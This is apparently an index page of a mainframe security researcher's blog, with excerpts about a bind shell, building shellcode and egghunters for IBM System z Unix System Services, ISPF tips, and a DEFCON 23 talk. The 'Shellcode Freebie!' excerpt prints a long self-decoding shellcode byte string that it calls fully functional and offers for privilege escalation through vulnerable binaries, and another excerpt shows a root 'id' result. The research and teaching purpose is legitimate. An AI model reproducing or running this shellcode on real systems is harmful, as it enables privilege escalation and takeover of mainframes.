Mainframe Bind Shell – Source Code

Key in any basic toolset for pentesting the mainframe platform is a selection of payloads that can be used to test vulnerabilities. Below is a bind shell payload, written from scratch in mainframe assembler.  The shell can be connected to using netcat. The payload differs from its Intel counterparts, in that it contains its own EBCDIC to ASCII… Continue reading Mainframe Bind Shell – Source Code

Building shellcode, egghunters and decoders.

Creating shellcode on System Z (Mainframe)  Unix System Services (USS) employs the same disciplines required for the same activities on Intel platforms.   The difference lies in the syntax, assembler mnemonics, tools available, and debugging utilities.  There are certainly other ways to achieve this, and I’m still refining my favorites.  The below is one of my… Continue reading Building shellcode, egghunters and decoders.

Shellcode Freebie!

Got a burning privesc vulnerable binary on your  USS? How about feeding it a little self-decoding shellcode?  (Hint this is fully functional, find a C stub and try it yourself!). “\x90\xec\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22” “\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12” “\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef” “\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4” “\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x17\x22\x17\x33\x1a\xb1” “\x1b\xb4\x50\xd0\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34” “\x1a\x34\x1a\x34\x1a\x34\x18\x53\x1b\x31\x18\x41\x17\x11\x17\x22” “\x97\x02\x30\x01\x1a\x14\xb9\xf8\x10\x23\x97\x02\x20\x01\xa7\x1e” “\x01\x70\xa7\x44\xff\xf9\x17\x44\x58\xd4\xb0\x04\x0d\xe5\xde\xad” “\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\xde\xad\xbe\xef\x92\xe9” “\xd2\x0e\xc2\xf2\xfd\xfd\xfd\xfc\x5a\x02\xf2\x2a\x5a\xf2\xf2\x2e” “\x5a\xe2\x02\x12\x5a\xec\x01\x06\x5a\xec\x02\xa2\xb0\x1a\xe2\x02” “\xa5\xf6\x02\x05\x02\x02\x02\x12\x02\xda\x02\x02\x02\x04\x1a\xff” “\x1a\xd3\x52\xf2\xd2\x06\x52\xd2\xf2\x0a\x5a\x12\xf2\x1a\x43\xa2” “\x02\xda\x1c\xaf\x52\xa2\xd2\x4a\xc2\x32\x02\x02\x02\x75\xe9\xe9” “\xd2\x96\x02\x24\xc2\xb2\x02\x02\x02\x77\x43\x22\x02\x02\x52\x22” “\xd2\x82\x43\xe2\x02\x05\x52\xe2\xd2\x86\x43\xe2\xd2\x82\x52\xe2” “\xd2\x8a\x1a\xe0\x52\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\x12\x5a\xe2” “\xd2\x92\xd0\x01\xd2\x92\xe0\x22\x5a\xe2\xd2\x92\xd0\x01\xd2\x92” “\xe2\x1a\x5a\xe2\xd2\x92\xd0\x01\xd2\x92\xe2\xe6\x5a\xe2\xd2\x8a” “\x1d\x02\x41\x02\xe2\x02\x5a\xf2\xd2\x92\x43\xe2\xd2\x82\x43\x42” “\xd2\x86\x43\x12\xd2\x4e\x52\x42\xd2\x4e\x1a\x49\x52\x42\xd2\x52” “\x52\xe2\xd2\x56\x52\x02\xd2\x5a\x52\x02\xd2\x5e\x52\xe2\xd2\x62” “\x52\x02\xd2\x66\x52\x02\xd2\x6a\x52\xe2\xd2\x6e\x52\x02\xd2\x72” “\x52\xe2\xd2\x76\x52\xe2\xd2\x7a\x52\xe2\xd2\x7e\xd0\x01\xd2\x0a”… Continue reading Shellcode Freebie!

Tips / Tricks – 7/2/15 (update)

Updated.  Added update to the packet capture section below, included pcap export! ISPF editor Want more real estate in your ISPF editor?   In an editing session enter EDSET in the command line, then check the line marked:   X Remove action bars in ISPF edit and view panels This will remove the menu bars and… Continue reading Tips / Tricks – 7/2/15 (update)

Mainframe shellcode

Come see my talk at DEFCON23. … SLR   14,14 MVC   32(4,13),16(14) L     14,32(,13) … \x1f\xee \xd2\x03\xd0\x20\xe0\x10 \x58\xe0\xd0\x20 … # id uid=0(IBMUSER) gid=0(SYS1) … Stay tuned to this site and follow @bigendiansmalls for sneak peeks at what I will be presenting!

Adventures in securing a “dinosaur”

This blog is my own chronicle of adventures in writing exploits, cryptography, security and who knows what else.   Specifically though, I’m going to start by sharing technical specifics to support my upcoming co-talk at Defcon 23. Our talk titled “Security Necromancy: Further Adventures in Mainframe Hacking” seeks to educate the security community to actively dig… Continue reading Adventures in securing a “dinosaur”